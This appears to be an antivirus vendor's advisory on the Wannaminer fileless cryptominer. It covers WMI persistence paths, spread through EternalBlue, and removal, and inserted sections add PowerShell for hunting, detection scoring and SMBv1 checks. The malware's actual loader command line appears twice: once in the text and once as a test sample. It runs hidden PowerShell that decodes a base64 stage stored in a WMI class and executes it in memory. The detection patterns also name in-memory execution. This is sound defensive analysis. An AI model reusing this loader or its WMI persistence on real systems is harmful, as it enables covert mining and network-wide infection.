Trojan.Win32.Wannaminer.a

General explanation

Type: Miner

Degree of destruction: high

Prevalence: high

Used Vulnerability: MS17-010 Exploit

Name:

• WMI.BAT.wannaminer (Padvish)
• NetWorm.Win32.Wannaminer (Padvish)
• Trojan:Win32/CoinMiner (Microsoft)
• Win32/CoinMiner.BWS (Eset)

What is a Miner?

Miners are individuals or software that extract cryptocurrencies, that is, mine them. Bitcoin is one such cryptocurrency. Mining bitcoin is a form of transaction confirmation performed in two difficult stages of the SHA256 hash. The Bitcoin network rewards miners with bitcoin for carrying out these complex calculations. Malware authors write malware that uses the victim’s system to mine bitcoin so that they pay nothing for the computation. These calculations occupy the CPU of the victim’s system and slow it down.

What is Wannaminer malware?

This malware is a subset of bitcoin-miner malware: it mines cryptocurrency through malicious scripts and, at the same time, can spread itself across the network. It does not place any file of its own on the victim’s system; it keeps all downloaded scripts in memory and executes them from there. Consequently, this malware is fileless.

Technical Explanation

Signs of infection

  • A task related to the sysupdater0.bat file exists in the Task Scheduler of some systems. The malware also establishes persistence for itself in the following WMI paths by creating a class named systemcore_Updater* and instances named SCM Event* Log Consumer and SCM Event* Log Consumer*:
    • WMIC:\\.\ROOT\DEFAULT:systemcore_Updater*
    • WMIC:\\.\ROOT\subscription:CommandLineEventConsumer.Name="SCM Event* Log Consumer"
    • WMIC:\\.\ROOT\subscription:CommandLineEventConsumer.Name="SCM Event* Log Consumer*"

The following image shows the MOF object contents of SCM Event* Log Consumer:

The following image also shows the persistence entry the malware placed in WMI:
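The following hunting script is an added example and not part of the original write-up. It looks for the three persistence artifacts described above: the systemcore_Updater* class in root\default, the "SCM Event* Log Consumer" subscription in root\subscription, and a scheduled task that runs sysupdater0.bat. The -Remove switch is this script's own assumption (run without it first and review the findings); the cmdlets require an elevated prompt on Windows 8 / Server 2012 or later.

```powershell
# Added hunting script, not part of the original write-up. Finds the WMI class,
# the permanent event subscription and the scheduled task described above.
# -Remove is this script's own assumption; run without it first. Needs elevation.
[CmdletBinding()]
param([switch]$Remove)

$classPattern    = 'systemcore_Updater*'     # class whose default property values hold the payload
$consumerPattern = 'SCM Event*Log Consumer*' # covers both consumer names listed above
$taskFile        = 'sysupdater0.bat'

# 1. Malicious WMI class: its 'funs' property carries the base64 stage. Report, never execute.
$classes = @(Get-CimClass -Namespace 'root\default' -ClassName $classPattern -ErrorAction SilentlyContinue)
foreach ($c in $classes) {
    [pscustomobject]@{
        Artifact = 'WMI class'
        Name     = $c.CimClassName
        Detail   = "funs property length: $("$($c.CimClassProperties['funs'].Value)".Length)"
    }
}

# 2. Permanent event subscription: consumer, the bindings that reference it, and their filters
$consumers = @(Get-CimInstance -Namespace 'root\subscription' -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -like $consumerPattern })
$bindings  = @(Get-CimInstance -Namespace 'root\subscription' -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
    Where-Object { $_.Consumer.Name -like $consumerPattern })
$filterNames = @($bindings | ForEach-Object { $_.Filter.Name })
$filters   = @(Get-CimInstance -Namespace 'root\subscription' -ClassName __EventFilter -ErrorAction SilentlyContinue |
    Where-Object { $filterNames -contains $_.Name })

foreach ($x in $consumers) { [pscustomobject]@{ Artifact = 'WMI consumer'; Name = $x.Name; Detail = $x.CommandLineTemplate } }
foreach ($x in $filters)   { [pscustomobject]@{ Artifact = 'WMI filter';   Name = $x.Name; Detail = $x.Query } }

# 3. Scheduled task whose action points at the dropped batch file
$tasks = @(Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
    @($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -like "*$taskFile*" })
foreach ($t in $tasks) { [pscustomobject]@{ Artifact = 'Scheduled task'; Name = $t.TaskName; Detail = $t.TaskPath } }

if ($Remove) {
    # Order matters: bindings first, then consumer and filter, then the payload class and task
    $bindings  | Remove-CimInstance
    $consumers | Remove-CimInstance
    $filters   | Remove-CimInstance
    foreach ($c in $classes) { ([wmiclass]"root\default:$($c.CimClassName)").Delete() }
    $tasks | Unregister-ScheduledTask -Confirm:$false
}
```

Each finding is emitted as an object with Artifact, Name and Detail, so the output can be piped to Export-Csv for the incident record; the filter Query and the consumer CommandLineTemplate are the two values worth preserving before removal, because they show what triggers the loader and what it runs.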

This malware uses WMI to run PowerShell on the victim’s system and, through it, executes the related bitcoin-miner scripts:

  • A PowerShell process in the current process list whose command line connects to a bitcoin server
  • A PowerShell process in the current process list whose command line contains code obfuscated with base64
  • A PowerShell process in the current process list whose command line is as follows:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater*').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater*').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
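The following detection example is added here and is not code from the original write-up. Test-WannaminerCommandLine scores a process command line against indicators taken from the loader quoted above; Get-WannaminerProcess applies it to the live process list; Export-WannaminerPayload decodes the base64 'funs' blob the loader reads from the WMI class into a text file for analyst review instead of executing it. The function names and the three-indicator threshold are this example's own choices, and the benign command line at the end is constructed.

```powershell
# Added detection example, not part of the original write-up.
function Test-WannaminerCommandLine {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    # Each indicator is taken from the loader command line quoted in the write-up.
    $indicators = @(
        '-W\s+Hidden',                                         # hidden window
        '\[WmiClass\]\s*''root\\default:systemcore_Updater',   # stage stored in a WMI class
        'FromBase64String',                                    # base64-encoded stage
        '\biex\b|Invoke-Expression',                           # in-memory execution
        'Invoke-Command\s+-ScriptBlock\s+\$RemoteScriptBlock'  # hands the decoded block the 'mon' payload
    )
    $hits = @($indicators | Where-Object { $CommandLine -match $_ })
    # Threshold of three is this example's assumption: one or two hits are common in legitimate tooling
    [pscustomobject]@{ Score = $hits.Count; Suspicious = ($hits.Count -ge 3); Hits = $hits }
}

function Get-WannaminerProcess {
    # Scan running PowerShell processes; WMI-launched loaders normally have WmiPrvSE.exe as parent
    Get-CimInstance -ClassName Win32_Process -Filter "Name = 'powershell.exe'" | ForEach-Object {
        $r = Test-WannaminerCommandLine -CommandLine "$($_.CommandLine)"
        if ($r.Suspicious) {
            [pscustomobject]@{
                ProcessId       = $_.ProcessId
                ParentProcessId = $_.ParentProcessId
                Score           = $r.Score
                CommandLine     = $_.CommandLine
            }
        }
    }
}

function Export-WannaminerPayload {
    # Decode the 'funs' default property of the malicious class for offline review. Nothing is executed.
    param([string]$OutFile = "$env:TEMP\wannaminer_funs_decoded.txt")
    $classes = Get-CimClass -Namespace 'root\default' -ClassName 'systemcore_Updater*' -ErrorAction SilentlyContinue
    foreach ($c in $classes) {
        $b64 = "$($c.CimClassProperties['funs'].Value)"
        if ($b64) {
            [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b64)) | Set-Content -Path $OutFile
            $OutFile
        }
    }
}

# Offline self-check: the command line quoted in the write-up, then a constructed benign one.
$sample = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] ''root\default:systemcore_Updater*'').Properties[''mon''].Value;$funs = ([WmiClass] ''root\default:systemcore_Updater*'').Properties[''funs''].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, ''Void'', 0, '''', '''')"'
Test-WannaminerCommandLine -CommandLine $sample
Test-WannaminerCommandLine -CommandLine 'powershell.exe -File C:\scripts\backup.ps1'
Get-WannaminerProcess
```

The quoted loader matches all five indicators, while the constructed backup command matches none. Scoring rather than exact matching matters here because the class name and consumer name carry a variable suffix (the asterisk in the write-up) and the argument order of the loader can change between samples.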

Explanation of the behavior

This is fileless malware: it places no files on the victim’s system and only keeps the downloaded scripts in RAM and executes them from there. However, two file samples were obtained from this malware; both are removed from the disk after use.

sysupdater0.bat file

This file is created in the following path by the attacker over the network:
[root]:\windows\temp\sysupdater0.bat
The content of this file is:

mue.exe

This file is first created in the following path:
%SystemDirectory%\mue.exe
It then connects to its remote server and mines bitcoin by executing the schtasks.exe file located in the system32 folder and hijacking that process. After infecting the schtasks.exe process, it removes the mue.exe file.
The persistence procedure of this malware is as follows: once every 2 hours, it downloads a bat file from its server and executes the malware on the victim’s system. This bat file downloads a PowerShell file named in3.ps1. The malware uses an array of URLs to download in3.ps1 or in6.ps1; the contents of in3 are obfuscated. In general, the files of this malware are obfuscated and are turned into plain code using base64 decoders, with the decoding routines embedded in the middle of the program. This is the file that executes the EternalBlue exploit code against systems on the network.
After the malware abuses the EternalBlue (MS17-010) vulnerability, it creates a backdoor on other clients connected to the network and begins sending PowerShell scripts to them, which it then executes on the destination system.
A sample of the scripts sent by the malware to the victim’s system is as follows:

How to deal with it and disinfect the system

Padvish Antivirus detects this malware and disinfects any infections. To prevent attacks that use the EternalBlue vulnerability, install the MS17-010 security patch provided by Microsoft. Padvish IPS detects these attacks and prevents them from entering the system; therefore, to prevent this infection, install Padvish.
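As an added check that is not part of the original write-up: EternalBlue (MS17-010) exploits the SMBv1 server, so alongside installing the patch recommended above, a defender verifies that SMBv1 is disabled, which removes the exposed component even on hosts whose patch state is uncertain. The function names are this example's own; the cmdlets exist on Windows 8 / Server 2012 and later and need an elevated prompt. The patch itself is confirmed from the host's update history, which this snippet does not attempt.

```powershell
# Added mitigation check, not part of the original write-up. Confirms the SMBv1
# server (the component targeted by EternalBlue / MS17-010) is turned off.
function Get-Smb1Exposure {
    $server  = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        Smb1ServerEnabled = [bool]$server.EnableSMB1Protocol   # desired: False
        Smb1FeatureState  = "$($feature.State)"                 # desired: Disabled
    }
}

function Disable-Smb1 {
    # Turns the SMBv1 server off at the protocol level and removes the optional feature.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
}

Get-Smb1Exposure
```

Run Get-Smb1Exposure across the fleet (for example through Invoke-Command) and remediate any host reporting Smb1ServerEnabled True; the feature removal takes effect after a restart, which is why Disable-Smb1 also flips the server setting immediately.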
